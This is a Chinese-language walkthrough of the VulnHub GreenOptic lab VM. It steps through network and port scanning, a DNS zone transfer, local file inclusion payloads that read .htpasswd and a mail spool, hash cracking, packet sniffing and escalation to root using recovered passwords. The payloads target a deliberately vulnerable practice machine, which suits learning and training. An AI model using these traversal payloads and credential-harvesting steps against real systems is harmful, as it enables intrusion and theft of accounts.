vulnhub之GreenOptic的實踐
今天實踐的是vulnhub的GreenOptic鏡像,
下載地址,https://download.vulnhub.com/greenoptic/GreenOptic.ova,
先是用workstation導(dǎo)入,點擊編輯配置就直接崩潰了,
于是又用virtualbox導(dǎo)入,做地址掃描,
sudo netdiscover -r 192.168.0.0/24,有地址了,190就是,

再繼續(xù)做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,

有web服務(wù),瀏覽器訪問http://192.168.0.190:10000,

提示了域名,編輯/etc/hosts,添加IP和域名靜態(tài)關(guān)系,
192.168.0.190 websrv01.greenoptic.vm,
做一下目錄暴破,dirb http://websrv01.greenoptic.vm,

瀏覽器訪問http://websrv01.greenoptic.vm/account,

猜測有文件包含漏洞,瀏覽器上直接利用沒成功,換burpsuite,

發(fā)現(xiàn)其它域名,dig @192.168.0.190 greenoptic.vm axfr,

編輯/etc/hosts,添加IP和域名靜態(tài)關(guān)系,
192.168.0.190 recoveryplan.greenoptic.vm,
瀏覽器訪問http://recoveryplan.greenoptic.vm,

繼續(xù)用burpsuite做文件包含,../../../../var/www/.htpasswd,

獲取到staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.,
放到hash文件里,用John The Ripper進(jìn)行破解,

獲取到staff/wheeler,回到上面的頁面進(jìn)行登錄,
查看信息,發(fā)現(xiàn)提示,

下載dpi.zip,再繼續(xù)用burpsuite做文件包含,../../../../var/mail/sam,

獲取到解壓密碼HelloSunshine123,解壓后查看抓包文件,

獲取到alex/FwejAASD1,ssh登錄試試,ssh alex@192.168.0.190,
發(fā)現(xiàn)當(dāng)前賬戶可以抓包,dumpcap -i lo -w test.pcap,

ftp可以把抓包下載出來,

查看抓包文件,

獲取到密碼,
AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=,
base64解碼,
echo "AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=" | base64 -d; echo "",
獲取到rootASfojoj2eozxczzmedlmedASASDKoj3o,
ASfojoj2eozxczzmedlmedASASDKoj3o應(yīng)該就是root的密碼,
切到root,su -,id確認(rèn)沒問題。